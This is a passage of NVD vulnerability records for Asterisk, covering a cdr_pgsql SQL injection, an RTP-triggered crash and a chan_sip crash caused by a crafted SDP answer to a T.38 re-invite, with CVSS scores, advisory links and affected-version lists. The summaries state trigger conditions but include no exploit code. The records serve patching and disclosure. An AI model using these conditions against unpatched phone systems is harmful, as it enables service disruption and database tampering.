  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2007-11-30 01:46

Modified

2024-11-21 00:39

Severity ?

Summary

SQL injection vulnerability in the Call Detail Record Postgres logging engine (cdr_pgsql) in Asterisk 1.4.x before 1.4.15, 1.2.x before 1.2.25, B.x before B.2.3.4, and C.x before C.1.0-beta6 allows remote authenticated users to execute arbitrary SQL commands via (1) ANI and (2) DNIS arguments.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2007-026.html	Patch, Vendor Advisory
cve@mitre.org	http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00001.html	Third Party Advisory
cve@mitre.org	http://secunia.com/advisories/27827	Third Party Advisory
cve@mitre.org	http://secunia.com/advisories/27892	Third Party Advisory
cve@mitre.org	http://secunia.com/advisories/29242	Third Party Advisory
cve@mitre.org	http://secunia.com/advisories/29782	Third Party Advisory
cve@mitre.org	http://security.gentoo.org/glsa/glsa-200804-13.xml	Third Party Advisory
cve@mitre.org	http://securitytracker.com/id?1019020	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.debian.org/security/2007/dsa-1417	Third Party Advisory
cve@mitre.org	http://www.securityfocus.com/archive/1/484388/100/0/threaded	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securityfocus.com/bid/26647	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.vupen.com/english/advisories/2007/4056	Third Party Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/38765	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2007-026.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00001.html	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/27827	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/27892	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/29242	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/29782	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://security.gentoo.org/glsa/glsa-200804-13.xml	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1019020	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2007/dsa-1417	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/484388/100/0/threaded	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/26647	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2007/4056	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/38765	Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	c.1.0
digium	asterisk	c.1.0
digium	asterisk	c.1.0
digium	asterisk	c.1.0
digium	asterisk	c.1.0
debian	debian_linux	3.1
debian	debian_linux	4.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B9D3734-ECE5-4A33-AFE2-1EAD07B997A5",
              "versionEndExcluding": "1.2.25",
              "versionStartIncluding": "1.2.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "509EE4B3-B44A-446F-B1B5-476A8BE0F4D6",
              "versionEndExcluding": "1.4.15",
              "versionStartIncluding": "1.4.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:business:*:*:*",
              "matchCriteriaId": "DEF6C31E-6C5C-4CBA-B6D7-593C1292AF65",
              "versionEndExcluding": "b.2.3.4",
              "versionStartIncluding": "b.2.3.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta1:*:*:business:*:*:*",
              "matchCriteriaId": "5B85E573-3A3A-471F-906D-8A262315D0CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta2:*:*:business:*:*:*",
              "matchCriteriaId": "65963B39-845B-47D9-A1BD-6ABBA160EF05",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta3:*:*:business:*:*:*",
              "matchCriteriaId": "4015BA36-F972-434D-8DA0-4ECE9992275A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta4:*:*:business:*:*:*",
              "matchCriteriaId": "587B6E6C-11C5-4721-B0F3-77E77B1C65A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta5:*:*:business:*:*:*",
              "matchCriteriaId": "E4160773-6EA9-4339-9DD1-28D4EE591830",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A2E0C1F8-31F5-4F61-9DF7-E49B43D3C873",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0F92AB32-E7DE-43F4-B877-1F41FA162EC7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SQL injection vulnerability in the Call Detail Record Postgres logging engine (cdr_pgsql) in Asterisk 1.4.x before 1.4.15, 1.2.x before 1.2.25, B.x before B.2.3.4, and C.x before C.1.0-beta6 allows remote authenticated users to execute arbitrary SQL commands via (1) ANI and (2) DNIS arguments."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de inyecci\u00f3n SQL en el motor de registro Call Detail Record Postgres (cdr_pgsql) de Asterisk 1.4.x anterior a 1.4.15, 1.2.x anterior a 1.2.25, B.x anterior a B.2.3.4, y C.x anterior a C.1.0-beta6 permite a usuarios remotos autenticados ejecutar comandos SQL de su elecci\u00f3n mediante los argumentos (1) ANI y (2) DNIS."
    }
  ],
  "id": "CVE-2007-6170",
  "lastModified": "2024-11-21T00:39:30.887",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-11-30T01:46:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2007-026.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/27827"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/27892"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/29242"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/29782"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://security.gentoo.org/glsa/glsa-200804-13.xml"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://securitytracker.com/id?1019020"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2007/dsa-1417"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/archive/1/484388/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/26647"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/4056"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38765"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2007-026.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/27827"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/27892"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/29242"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/29782"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://security.gentoo.org/glsa/glsa-200804-13.xml"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://securitytracker.com/id?1019020"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2007/dsa-1417"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/archive/1/484388/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/26647"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/4056"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38765"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2019-09-09 13:15

Modified

2024-11-21 04:29

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

main/translate.c in Sangoma Asterisk 13.28.0 and 16.5.0 allows a remote attacker to send a specific RTP packet during a call and cause a crash in a specific scenario.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2019-005.html	Vendor Advisory
cve@mitre.org	http://packetstormsecurity.com/files/154372/Asterisk-Project-Security-Advisory-AST-2019-005.html	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2019-005.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/154372/Asterisk-Project-Security-Advisory-AST-2019-005.html	Third Party Advisory, VDB Entry

Impacted products

	Vendor	Product	Version
	digium	asterisk	*
	digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "6C3029AD-D0F4-47F2-9D4B-0A4ECDBC25F1",
              "versionEndIncluding": "13.28.0",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "465E0365-BCFD-4444-A046-D0BD45E40309",
              "versionEndIncluding": "16.5.0",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "main/translate.c in Sangoma Asterisk 13.28.0 and 16.5.0 allows a remote attacker to send a specific RTP packet during a call and cause a crash in a specific scenario."
    },
    {
      "lang": "es",
      "value": "El archivo main/translate.c en Sangoma Asterisk versiones 13.28.0 y 16.5.0, permite a un atacante remoto enviar un paquete RTP espec\u00edfico durante una llamada y causar un bloqueo en un escenario espec\u00edfico."
    }
  ],
  "id": "CVE-2019-15639",
  "lastModified": "2024-11-21T04:29:10.587",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-09-09T13:15:11.620",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2019-005.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/154372/Asterisk-Project-Security-Advisory-AST-2019-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2019-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/154372/Asterisk-Project-Security-Advisory-AST-2019-005.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2019-07-12 20:15

Modified

2024-11-21 04:24

Severity ?

5.3 (Medium) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in Asterisk Open Source through 13.27.0, 14.x and 15.x through 15.7.2, and 16.x through 16.4.0, and Certified Asterisk through 13.21-cert3. A pointer dereference in chan_sip while handling SDP negotiation allows an attacker to crash Asterisk when handling an SDP answer to an outgoing T.38 re-invite. To exploit this vulnerability an attacker must cause the chan_sip module to send a T.38 re-invite request to them. Upon receipt, the attacker must send an SDP answer containing both a T.38 UDPTL stream and another media stream containing only a codec (which is not permitted according to the chan_sip configuration).

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2019-003.html	Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-28465	Issue Tracking, Vendor Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html	Mailing List, Third Party Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2019-003.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-28465	Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	Mailing List, Third Party Advisory

Impacted products

Vendor	Product	Version
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.1.0
digium	certified_asterisk	1.8.1.0
digium	certified_asterisk	1.8.2.0
digium	certified_asterisk	1.8.2.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.5.0
digium	certified_asterisk	1.8.5.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.14.0
digium	certified_asterisk	1.8.14.0
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28
digium	certified_asterisk	1.8.28.0
digium	certified_asterisk	11.0.0
digium	certified_asterisk	11.0.0
digium	certified_asterisk	11.0.0
digium	certified_asterisk	11.1.0
digium	certified_asterisk	11.1.0
digium	certified_asterisk	11.1.0
digium	certified_asterisk	11.1.0
digium	certified_asterisk	11.2
digium	certified_asterisk	11.2
digium	certified_asterisk	11.2
digium	certified_asterisk	11.2
digium	certified_asterisk	11.3.0
digium	certified_asterisk	11.3.0
digium	certified_asterisk	11.3.0
digium	certified_asterisk	11.4.0
digium	certified_asterisk	11.4.0
digium	certified_asterisk	11.4.0
digium	certified_asterisk	11.4.0
digium	certified_asterisk	11.5.0
digium	certified_asterisk	11.5.0
digium	certified_asterisk	11.5.0
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1.0
digium	certified_asterisk	13.1.0
digium	certified_asterisk	13.1.0
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8.0
digium	certified_asterisk	13.8.0
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13-cert2
digium	certified_asterisk	13.18
digium	certified_asterisk	13.18
digium	certified_asterisk	13.18
digium	certified_asterisk	13.18
digium	certified_asterisk	13.18
digium	certified_asterisk	13.18
digium	certified_asterisk	13.18
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
debian	debian_linux	8.0
debian	debian_linux	9.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "93F2B062-09B4-44F1-87E4-6104B757B557",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "F2877B09-B0B9-4AD4-906A-D40E25DDC4BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "11AAE0EA-D7EB-4341-A412-FBCDC99565A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "37F93124-25D9-44ED-B4AB-1B3552FCAB09",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "E4CB22F6-9F63-427C-B2D2-7ABB9B4F7694",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "758AB27B-7C40-41ED-9FC3-BE3D682EE48A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "07D3186A-CD6F-432A-8653-4CFBA37B9864",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "746FB2E6-EF66-4EF3-946C-111FB7728EBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "91D933DB-06F7-45A4-A517-BFAEC82DDB7D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "3AAB500F-8F0D-4534-B659-C495D1799913",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F5C5156-CC72-4AB5-A927-E874199EBD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "AB912D4D-6BA4-4AEF-BBFD-EABFED240015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "68C78C16-3807-4272-9B46-9D9AF5150879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.2.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "02E13D3A-B37B-4215-82E0-3FCE5E35B00A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BE0F93D1-7602-47AC-9ACE-AA850D7DFD23",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "956BCED3-1818-4673-A0F4-E7F03F366D99",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0B58ACCC-0255-46B1-8517-EDCD85AA0F35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A921B590-57C2-4E0A-B28B-D0E48F5E1B58",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "70F0AE7B-9E53-4E3B-AA9E-EAF7C4C31E1D",
              "vulnerable": true
            },
            {
